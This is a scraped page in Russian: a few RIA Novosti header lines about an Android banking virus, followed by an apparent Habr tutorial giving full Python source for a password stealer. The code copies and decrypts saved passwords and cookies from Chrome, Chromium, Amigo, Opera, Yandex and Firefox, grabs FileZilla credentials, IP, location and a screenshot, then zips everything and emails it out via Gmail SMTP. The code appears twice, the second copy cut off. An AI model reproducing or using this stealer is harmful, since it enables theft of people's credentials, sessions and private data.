https://radiosputnik.ria.ru/20210725/obschestvo-1742822197.html
россия
РИА Новости
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/
2021
РИА Новости
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/
Новости
ru-RU
https://ria.ru/docs/about/copyright.html
https://xn--c1acbl2abdlkab1og.xn--p1ai/
РИА Новости
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/
https://cdnn21.img.ria.ru/images/148636/83/1486368380_312:0:5304:3744_1920x0_80_0_0_26c878018d5fae7f4d9aa1937dc7655b.jpgРИА Новости
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/
РИА Новости
internet-group@rian. ru
7 495 645-6601
ФГУП МИА «Россия сегодня»
https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/
в мире, общество, технологии, google android, лаборатория касперского, россия
12:28 02.08.2021 (обновлено: 12:51 02.08.2021)Обнаружен ворующий банковские пароли Android-вирус
Стиллер паролей на python с отправкой на почту / Хабр
Стиллер паролей на python
Привет, сейчас будем делать стиллер паролей на ЯП python. Наш стиллер будет воровать пароли браузеров таких как хром, яндекс браузер, амиго, и др., их куки, делать скриншот экрана, узнавать айпи адрес пк на котором открыли стиллер, его место нахождение и его установленная система.
Приступим к делу
Создаем новый файл в IDLE Python или в другой IDE.
Подключаем все нужные библиотеки. В некоторых нужно в cmd скачивать модули.
pip install pyinstaller
pip install requests==2.7.0
pip install pywin32
pip install ip2geotools
pip install opencv-python
pip install Pillow
pip install db-sqlite3
pip install temp
import os
from Crypto.
Hash import SHA512
import sqlite3
import win32crypt
import email, ssl
import shutil
import requests
import zipfile
import getpass
import ip2geotools
import win32api
import platform
import tempfile
import smtplib
import time
import cv2
import sys
from PIL import ImageGrab
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.message import Message
from email.mime.multipart import MIMEBase
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
from email import encoders
from Tools.demo.mcast import sender
from ip2geotools.databases.noncommercial import DbIpCity
from os.path import basename
from smtplib import SMTP
from email.header import Header
from email.utils import parseaddr, formataddr
from base64 import encodebytes
import random
Собираем с пользователя все его данные.
################################################################################
# ВСЕ ДАННЫЕ И ЛОКАЦИЯ #
################################################################################
drives = str(win32api.
GetLogicalDriveStrings())
drives = str(drives.split('\000')[:-1])
response = DbIpCity.get(requests.get("https://ramziv.com/ip").text, api_key='free')
all_data = "Time: " + time.asctime() + '\n' + "Кодировка ФС: " + sys.getfilesystemencoding() + '\n' + "Cpu: " + platform.processor() + '\n' + "Система: " + platform.system() + ' ' + platform.release() + '\nIP: '+requests.get("https://ramziv.com/ip").text+'\nГород: '+response.city+'\nGen_Location:' + response.to_json() + '\nДиски:' + drives
file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+") #создаем txt с его расположением
file.write(all_data)#записываем данные
file.close()#выходим
Собираем пароли с хрома.
################################################################################
# GOOGLE PASSWORDS #
################################################################################
def Chrome():
text = 'Passwords Chrome:' + '\n'
text += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
text += url + ' | ' + login + ' | ' + password + '\n'
return text
file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+") #создаем txt с его расположением
file.write(str(Chrome()) + '\n')#записываем данные
file.close()
#выходим
Собираем куки с хрома.
################################################################################
# GOOGLE Cookies #
################################################################################
def Chrome_cockie():
textc = 'Cookies Chrome:' + '\n'
textc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textc
file = open(os.
getenv("APPDATA") + '\\google_cookies.txt', "w+")
file.write(str(Chrome_cockie()) + '\n')
file.close()
Куки с firefox.
################################################################################
# FIREFOX Cookies #
################################################################################
def Firefox():
textf = ''
textf +='Firefox Cookies:' + '\n'
textf += 'URL | COOKIE | COOKIE NAME' + '\n'
for root, dirs, files in os.walk(os.getenv("APPDATA") + '\\Mozilla\\Firefox\\Profiles'):
for name in dirs:
conn = sqlite3.connect(os.path.join(root, name)+'\\cookies.sqlite')
cursor = conn.cursor()
cursor.execute("SELECT baseDomain, value, name FROM moz_cookies")
data = cursor.fetchall()
for i in range(len(data)):
url, cookie, name = data[i]
textf += url + ' | ' + str(cookie) + ' | ' + name + '\n'
break
return textf
file = open(os.
getenv("APPDATA") + '\\firefox_cookies.txt', "w+")
file.write(str(Firefox()) + '\n')
file.close()
Пароли с хромиума.
################################################################################
# CHROMIUM PASSWORDS #
################################################################################
def chromium():
textch ='Chromium Passwords:' + '\n'
textch += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.
CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textch += url + ' | ' + login + ' | ' + password + '\n'
return textch
file = open(os.getenv("APPDATA") + '\\chromium.txt', "w+")
file.write(str(chromium()) + '\n')
file.close()
Куки с хромиума.
################################################################################
# CHROMIUM cookies #
################################################################################
def chromiumc():
textchc = ''
textchc +='Chromium Cookies:' + '\n'
textchc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
conn = sqlite3.
connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textchc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textchc
file = open(os.getenv("APPDATA") + '\\chromium_cookies.txt', "w+")
file.write(str(chromiumc()) + '\n')
file.close()
Пароли с амиго.
################################################################################
# AMIGO PASSWORDS #
################################################################################
def Amigo():
textam = 'Passwords Amigo:' + '\n'
textam += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data'):
shutil.
copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textam += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\amigo_pass.txt', "w+")
file.write(str(Amigo()) + '\n')
file.close()
Куки с амиго.
################################################################################
# AMIGO cookies #
################################################################################
def Amigo_c():
textamc = 'Cookies Amigo:' + '\n'
textamc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textamc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textamc
file = open(os.getenv("APPDATA") + '\\amigo_cookies.txt', "w+")
file.write(str(Amigo_c()) + '\n')
file.close()
Пароли с оперы.
################################################################################
# OPERA PASSWORDS #
################################################################################
def Opera():
texto = 'Passwords Opera:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\opera_pass.txt', "w+")
file.write(str(Opera()) + '\n')
file.close()
Пароли с фаира.
################################################################################
# FIREFOX PASSWORDS #
################################################################################
def Firefox_cookies():
texto = 'Passwords firefox:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox'):
shutil.copy2(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2', os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\firefox_pass.txt', "w+")
file.write(str(Firefox_cookies()) + '\n')
file.close()
Пароли с яндекс браузера.
################################################################################
# YANDEX PASSWORDS #
################################################################################
def Yandexpass():
textyp = 'Passwords Yandex:' + '\n'
textyp += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandexe\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textyp += url + ' | ' + login + ' | ' + password + '\n'
return textyp
file = open(os.getenv("APPDATA") + '\\yandex_passwords.txt', "w+")
file.write(str(Yandexpass()) + '\n')
file.close()
Куки с оперы.
################################################################################
# OPERA cookies #
################################################################################
def Opera_c():
textoc ='Cookies Opera:' + '\n'
textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textoc
file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")
file.write(str(Opera_c()) + '\n')
file.close()
Данные с FILEZILLA.
################################################################################
# FILEZILLA #
################################################################################
def filezilla():
try:
data = ''
if os.
path.isfile(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml') is True:
root = etree.parse(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml').getroot()
for i in range(len(root[0])):
host = root[0][i][0].text
port = root[0][i][1].text
user = root[0][i][4].text
password = base64.b64decode(root[0][i][5].text).decode('utf-8')
data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\n'
return data
else:
return 'Not found'
except Exception:
return 'Error'
textfz = filezilla()
textfz += 'Filezilla: ' + '\n' + filezilla() + '\n'
file = open(os.getenv("APPDATA") + '\\filezilla.txt', "w+")
file.write(str(filezilla()) + '\n')
file.close()
Делаем скриншот экрана.
################################################################################
# SCREEN #
################################################################################
screen = ImageGrab.
grab()
screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')
Тут записываем наши тхт в один ZIP — doc.
################################################################################
# PACKING TO ZIP #
################################################################################
zname = r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
NZ = zipfile.ZipFile(zname,'w')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\yandex_passwords.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\alldata.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_cookies.txt')
NZ.
write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\filezilla.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\sreenshot.jpg')
NZ.close()
Вот он наш ZIP по всеми данными.
################################################################################
# DOC-НАШ ZIP #
################################################################################
doc = 'C:\\Users\\' + getpass.
getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
Оформляем отправку.
################################################################################
# ОТПРАВКА #
################################################################################
'↑Stealler by Andrew_Shipunov↑'.encode('utf-8')
msgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')
msg = MIMEMultipart()
msg['From'] = 'тут ваша новая почта с которой отправится'
msg['To'] = 'почта на которую отправится'
msg['Subject'] = getpass.getuser() + '-PC'
msg.attach(msgtext)
Тут мы создаем вложение для нашего doc’а ZIP.
################################################################################
# СОЗДАНИЕ Вложения #
################################################################################
part = MIMEBase('application', "zip")
b = open(doc, "rb").
read()
bs = encodebytes(b).decode()
part.set_payload(bs)
part.add_header('Content-Transfer-Encoding', 'base64')
part.add_header('Content-Disposition', 'attachment; filename="LOG.zip"')
msg.attach(part)
Здесь мы собственно производим отправку на емаил с помощью SMTP
################################################################################
# ОТПРАВКА ВАМ #
################################################################################
s = smtplib.SMTP('smtp.gmail.com', 587)#ваш почтовый сервис,советую создавать новую гмаил
s.starttls()
s.login('тут ваша новая почта с которой отправится', 'тут пароль от новой почты')
s.sendmail('тут ваша новая почта с которой отправится', 'почта на которую отправится', msg.as_string())
s.quit()
i = input()
Чтобы отправилось сообщение с вашей новой почты gmail нужно проделать это:
На странице «Аккаунт Google» откройте раздел Ненадежные приложения, у которых есть доступ к аккаунту, и включите. Тогда все будет ОК.
import os
from Crypto.Hash import SHA512
import sqlite3
import win32crypt
import email, ssl
import shutil
import requests
import zipfile
import getpass
import ip2geotools
import win32api
import platform
import tempfile
import smtplib
import time
import cv2
import sys
from PIL import ImageGrab
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.message import Message
from email.mime.multipart import MIMEBase
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
from email import encoders
from Tools.demo.mcast import sender
from ip2geotools.databases.noncommercial import DbIpCity
from os.path import basename
from smtplib import SMTP
from email.header import Header
from email.utils import parseaddr, formataddr
from base64 import encodebytes
import random
################################################################################
# ВСЕ ДАННЫЕ И ЛОКАЦИЯ #
################################################################################
drives = str(win32api.
GetLogicalDriveStrings())
drives = str(drives.split('\000')[:-1])
response = DbIpCity.get(requests.get("https://ramziv.com/ip").text, api_key='free')
all_data = "Time: " + time.asctime() + '\n' + "Кодировка ФС: " + sys.getfilesystemencoding() + '\n' + "Cpu: " + platform.processor() + '\n' + "Система: " + platform.system() + ' ' + platform.release() + '\nIP: '+requests.get("https://ramziv.com/ip").text+'\nГород: '+response.city+'\nGen_Location:' + response.to_json() + '\nДиски:' + drives
file = open(os.getenv("APPDATA") + '\\alldata.txt', "w+")
file.write(all_data)
file.close()
################################################################################
# GOOGLE PASSWORDS #
################################################################################
def Chrome():
text = 'Passwords Chrome:' + '\n'
text += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data'):
shutil.
copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
text += url + ' | ' + login + ' | ' + password + '\n'
return text
file = open(os.getenv("APPDATA") + '\\google_pass.txt', "w+")
file.write(str(Chrome()) + '\n')
file.close()
################################################################################
# GOOGLE Cookies #
################################################################################
def Chrome_cockie():
textc = 'Cookies Chrome:' + '\n'
textc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textc
file = open(os.getenv("APPDATA") + '\\google_cookies.txt', "w+")
file.write(str(Chrome_cockie()) + '\n')
file.close()
################################################################################
# FIREFOX Cookies #
################################################################################
def Firefox():
textf = ''
textf +='Firefox Cookies:' + '\n'
textf += 'URL | COOKIE | COOKIE NAME' + '\n'
for root, dirs, files in os.
walk(os.getenv("APPDATA") + '\\Mozilla\\Firefox\\Profiles'):
for name in dirs:
conn = sqlite3.connect(os.path.join(root, name)+'\\cookies.sqlite')
cursor = conn.cursor()
cursor.execute("SELECT baseDomain, value, name FROM moz_cookies")
data = cursor.fetchall()
for i in range(len(data)):
url, cookie, name = data[i]
textf += url + ' | ' + str(cookie) + ' | ' + name + '\n'
break
return textf
file = open(os.getenv("APPDATA") + '\\firefox_cookies.txt', "w+")
file.write(str(Firefox()) + '\n')
file.close()
################################################################################
# CHROMIUM PASSWORDS #
################################################################################
def chromium():
textch ='Chromium Passwords:' + '\n'
textch += 'URL | LOGIN | PASSWORD' + '\n'
if os.path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default'):
shutil.
copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textch += url + ' | ' + login + ' | ' + password + '\n'
return textch
file = open(os.getenv("APPDATA") + '\\chromium.txt', "w+")
file.write(str(chromium()) + '\n')
file.close()
################################################################################
# CHROMIUM cookies #
################################################################################
def chromiumc():
textchc = ''
textchc +='Chromium Cookies:' + '\n'
textchc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Chromium\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textchc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textchc
file = open(os.getenv("APPDATA") + '\\chromium_cookies.txt', "w+")
file.write(str(chromiumc()) + '\n')
file.close()
################################################################################
# AMIGO PASSWORDS #
################################################################################
def Amigo():
textam = 'Passwords Amigo:' + '\n'
textam += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textam += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\amigo_pass.txt', "w+")
file.write(str(Amigo()) + '\n')
file.close()
################################################################################
# AMIGO cookies #
################################################################################
def Amigo_c():
textamc = 'Cookies Amigo:' + '\n'
textamc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Amigo\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textamc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textamc
file = open(os.getenv("APPDATA") + '\\amigo_cookies.txt', "w+")
file.write(str(Amigo_c()) + '\n')
file.close()
################################################################################
# OPERA PASSWORDS #
################################################################################
def Opera():
texto = 'Passwords Opera:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data'):
shutil.copy2(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data', os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\Opera Software\\Opera Stable\\Login Data2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\opera_pass.txt', "w+")
file.write(str(Opera()) + '\n')
file.close()
################################################################################
# FIREFOX PASSWORDS #
################################################################################
def Firefox_cookies():
texto = 'Passwords firefox:' + '\n'
texto += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox'):
shutil.copy2(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2', os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
conn = sqlite3.connect(os.getenv("APPDATA") + '\\AppData\\Roaming\\Mozilla\\Firefox2')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
texto += url + ' | ' + login + ' | ' + password + '\n'
file = open(os.getenv("APPDATA") + '\\firefox_pass.txt', "w+")
file.write(str(Firefox_cookies()) + '\n')
file.close()
################################################################################
# YANDEX PASSWORDS #
################################################################################
def Yandexpass():
textyp = 'Passwords Yandex:' + '\n'
textyp += 'URL | LOGIN | PASSWORD' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data.db', os.getenv("LOCALAPPDATA") + '\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Yandexe\\YandexBrowser\\User Data\\Default\\Ya Login Data2.db')
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
password = win32crypt.CryptUnprotectData(result[2])[1].decode()
login = result[1]
url = result[0]
if password != '':
textyp += url + ' | ' + login + ' | ' + password + '\n'
return textyp
file = open(os.getenv("APPDATA") + '\\yandex_passwords.txt', "w+")
file.write(str(Yandexpass()) + '\n')
file.close()
################################################################################
# OPERA cookies #
################################################################################
def Opera_c():
textoc ='Cookies Opera:' + '\n'
textoc += 'URL | COOKIE | COOKIE NAME' + '\n'
if os.
path.exists(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies'):
shutil.copy2(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies', os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
conn = sqlite3.connect(os.getenv("LOCALAPPDATA") + '\\Google\\Chrome\\User Data\\Default\\Cookies2')
cursor = conn.cursor()
cursor.execute("SELECT * from cookies")
for result in cursor.fetchall():
cookie = win32crypt.CryptUnprotectData(result[12])[1].decode()
name = result[2]
url = result[1]
textoc += url + ' | ' + str(cookie) + ' | ' + name + '\n'
return textoc
file = open(os.getenv("APPDATA") + '\\opera_cookies.txt', "w+")
file.write(str(Opera_c()) + '\n')
file.close()
################################################################################
# FILEZILLA #
################################################################################
def filezilla():
try:
data = ''
if os.
path.isfile(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml') is True:
root = etree.parse(os.getenv("APPDATA") + '\\FileZilla\\recentservers.xml').getroot()
for i in range(len(root[0])):
host = root[0][i][0].text
port = root[0][i][1].text
user = root[0][i][4].text
password = base64.b64decode(root[0][i][5].text).decode('utf-8')
data += 'host: ' + host + '|port: ' + port + '|user: ' + user + '|pass: ' + password + '\n'
return data
else:
return 'Not found'
except Exception:
return 'Error'
textfz = filezilla()
textfz += 'Filezilla: ' + '\n' + filezilla() + '\n'
